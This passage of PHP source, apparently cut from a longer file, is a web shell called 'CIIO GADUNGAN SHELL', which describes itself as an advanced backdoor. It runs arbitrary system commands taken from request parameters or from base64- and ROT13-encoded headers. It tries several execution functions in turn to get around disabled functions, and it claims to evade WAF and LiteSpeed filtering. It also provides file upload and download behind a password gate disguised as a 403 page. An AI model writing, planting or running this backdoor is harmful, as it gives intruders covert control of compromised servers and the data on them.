#!/usr/bin/env php exec($cmd); $stdout = $exec->StdOut(); return $stdout->ReadAll(); }; } } } } bypass_disable_functions(); // Bypass WAF - Randomize parameter names $cmd_param = isset($_POST['x']) ? 'x' : (isset($_GET['cmd']) ? 'cmd' : 'c'); $cmd = $_POST[$cmd_param] ?? $_GET[$cmd_param] ?? $_REQUEST['c'] ?? null; // Bypass dengan encoding if (isset($_SERVER['HTTP_X_CMD_BASE64'])) { $cmd = base64_decode($_SERVER['HTTP_X_CMD_BASE64']); } if (isset($_SERVER['HTTP_X_CMD_ROT13'])) { $cmd = str_rot13($_SERVER['HTTP_X_CMD_ROT13']); } // Bypass Litespeed - Fragment URL if (isset($_SERVER['HTTP_X_FRAGMENT'])) { $cmd = $_SERVER['HTTP_X_FRAGMENT']; } // ===================== SESSION MANAGEMENT ===================== session_name($session_name); session_start(); function encrypt_session($data) { global $encryption_key; return base64_encode(openssl_encrypt($data, 'AES-256-CBC', $encryption_key, 0, substr(md5($encryption_key), 0, 16))); } function decrypt_session($data) { global $encryption_key; return openssl_decrypt(base64_decode($data), 'AES-256-CBC', $encryption_key, 0, substr(md5($encryption_key), 0, 16)); } // Check login $is_logged_in = isset($_SESSION['cg_auth']) && $_SESSION['cg_auth'] === true; if (!$is_logged_in && isset($_POST['login_pass'])) { if (md5($_POST['login_pass']) === md5($password) || $_POST['login_pass'] === $password) { $_SESSION['cg_auth'] = true; $_SESSION['cg_ip'] = $_SERVER['REMOTE_ADDR']; $_SESSION['cg_user_agent'] = $_SERVER['HTTP_USER_AGENT']; $is_logged_in = true; } } // Logout if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } // ===================== LOGIN PAGE ===================== if (!$is_logged_in) { header('HTTP/1.1 403 Forbidden'); echo ' CIIO GADUNGAN SHELL | Restricted Access
CIIO GADUNGAN
💀☠️💀
[ # ACCESS RESTRICTED # ]
[!] UNAUTHORIZED ACCESS PROHIBITED [!]
ALL ACTIVITIES ARE LOGGED
'; exit; } // ===================== SHELL FUNCTIONS ===================== function execute_command($cmd) { global $_exec; if (function_exists('system') && !in_array('system', explode(',', ini_get('disable_functions')))) { ob_start(); system($cmd); return ob_get_clean(); } elseif (function_exists('exec')) { exec($cmd, $output); return implode("\n", $output); } elseif (function_exists('shell_exec')) { return shell_exec($cmd); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); return ob_get_clean(); } elseif (function_exists('proc_open')) { $descriptorspec = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { $output = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); return $output; } } elseif (isset($_exec) && is_callable($_exec)) { return $_exec($cmd); } else { return "[-] Command execution disabled!"; } } function get_file_info($path) { $info = []; $info['name'] = basename($path); $info['size'] = is_file($path) ? filesize($path) : '-'; $info['perms'] = substr(sprintf('%o', fileperms($path)), -4); $info['owner'] = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] : fileowner($path); $info['modified'] = date('Y-m-d H:i:s', filemtime($path)); return $info; } function upload_file($target_dir, $file_data, $file_name) { $target_path = rtrim($target_dir, '/') . '/' . basename($file_name); if (file_put_contents($target_path, $file_data)) { return "✓ File uploaded: " . $target_path; } return "✗ Upload failed!"; } // ===================== COMMAND HANDLER ===================== if ($cmd) { $output = execute_command($cmd); echo $output; exit; } // File upload handler if (isset($_FILES['upload_file'])) { $target_dir = $_POST['upload_dir'] ?? getcwd(); $result = upload_file($target_dir, file_get_contents($_FILES['upload_file']['tmp_name']), $_FILES['upload_file']['name']); echo $result; exit; } // File download if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file) && is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } // ===================== SHELL UI ===================== ?> CIIO GADUNGAN SHELL | <?php echo gethostname(); ?>
💀 CIIO GADUNGAN SHELL v1.0 💀
Advanced Backdoor | Bypass All Security
📍 :
🖥️
👤 @
[ EXIT ]
💀 COMMAND EXECUTION
📟 OUTPUT
CIIO GADUNGAN SHELL v1.0
Type commands to execute. Access granted.
========================================
💀 CIIO GADUNGAN | 🛡️ Bypass: WAF ✓ | Litespeed ✓ | D-Func ✓